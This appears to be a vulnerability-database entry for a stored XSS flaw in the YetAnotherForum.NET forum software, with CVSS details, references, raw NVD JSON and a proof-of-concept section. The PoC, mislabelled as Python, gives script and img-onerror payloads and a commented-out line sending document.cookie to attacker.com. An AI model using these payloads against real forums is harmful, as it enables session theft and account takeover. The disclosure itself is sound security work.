CVE-2026-43939

Description

YetAnotherForum.NET (YAF.NET) is a C# ASP.NET forum. Prior to 4.0.5 and 3.2.12, the thread posting and reply feature accepts user-supplied content via a a post or reply that is stored server-side and later rendered back into the thread page without adequate HTML sanitization or contextual output encoding. This vulnerability is fixed in 4.0.5 and 3.2.12.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

YetAnotherForum.NET < 4.0.5

YetAnotherForum.NET < 3.2.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Proof of Concept for CVE-2026-43939 Stored XSS -->
<!-- Step 1: Login as a low-privilege user -->
<!-- Step 2: Create a new post or reply with the following content -->

<script>
  // Malicious payload to demonstrate execution
  alert('XSS Vulnerability CVE-2026-43939 Exploited');
  
  // Example: Exfiltrate document cookies
  // fetch('https://attacker.com/log?c=' + encodeURIComponent(document.cookie));
</script>

<!-- Alternative payload if script tags are partially blocked but attributes are not -->
<img src=x onerror=alert('CVE-2026-43939')>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43939
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43939
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43939/
[4] VulDB https://vuldb.com/cve/CVE-2026-43939
[5] https://github.com/YAFNET/YAFNET/security/advisories/GHSA-8rq5-wwpp-fmj2
[6] https://github.com/YAFNET/YAFNET/security/advisories/GHSA-8rq5-wwpp-fmj2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43939", "sourceIdentifier": "[email protected]", "published": "2026-05-12T15:16:15.647", "lastModified": "2026-05-13T18:24:58.737", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "YetAnotherForum.NET (YAF.NET) is a C# ASP.NET forum. Prior to 4.0.5 and 3.2.12, the thread posting and reply feature accepts user-supplied content via a a post or reply that is stored server-side and later rendered back into the thread page without adequate HTML sanitization or contextual output encoding. This vulnerability is fixed in 4.0.5 and 3.2.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}, {"lang": "en", "value": "CWE-116"}]}], "references": [{"url": "https://github.com/YAFNET/YAFNET/security/advisories/GHSA-8rq5-wwpp-fmj2", "source": "[email protected]"}, {"url": "https://github.com/YAFNET/YAFNET/security/advisories/GHSA-8rq5-wwpp-fmj2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}